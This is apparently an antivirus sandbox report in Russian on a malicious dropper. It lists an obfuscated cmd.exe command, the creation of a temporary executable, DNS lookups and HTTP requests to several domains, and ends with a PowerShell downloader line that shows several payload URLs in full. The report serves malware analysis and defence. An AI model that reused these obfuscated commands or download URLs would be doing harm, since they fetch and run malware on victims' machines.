Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \C"^s^et [^`'^}=i^;^br^ea&&s^e^t ;^'^?=a^l^th&&^s^et +'^.^;=Nu^U^.ty&&s^e^t ^?^'=^t&&^se^t ^@^,=^;$V^Zr^='^htt^p&&^s^et ]^-^\{=;^Star^t-Proc^e^ss^ ^$WO&&^se^t ^]^#^~=;$N^u^U^ ^=&&^se^t ,^~^{=;^...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\qwc.exe
Сетевая активность
Подключается к
- 'as######ehealthsystems.com':80
- 'sm#v.ru':80
- 'im###kine.com':80
- 'af#####ationships.com':80
TCP
Запросы HTTP GET
- http://as######ehealthsystems.com/EIEg9GrICd
- http://sm#v.ru/2zlwZI7
- http://im###kine.com/g05bnc2fVE
- http://af#####ationships.com/RbVvITZSS
UDP
- DNS ASK ob###lon.com
- DNS ASK as######ehealthsystems.com
- DNS ASK sm#v.ru
- DNS ASK im###kine.com
- DNS ASK af#####ationships.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \C"^s^et [^`'^}=i^;^br^ea&&s^e^t ;^'^?=a^l^th&&^s^et +'^.^;=Nu^U^.ty&&s^e^t ^?^'=^t&&^se^t ^@^,=^;$V^Zr^='^htt^p&&^s^et ]^-^\{=;^Star^t-Proc^e^ss^ ^$WO&&^se^t ^]^#^~=;$N^u^U^ ^=&&^se^t ,^~^{=;^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $qsJ='jvY';$VZr='http://ob###lon.com/3GLGQqd@http://assistivehealthsystems.com/EIEg9GrICd@http://smmv.ru/2zlwZI7@http://imsmakine.com/g05bnc2fVE@http://afrorelationships.com/RbVvITZSS'.Split('@...
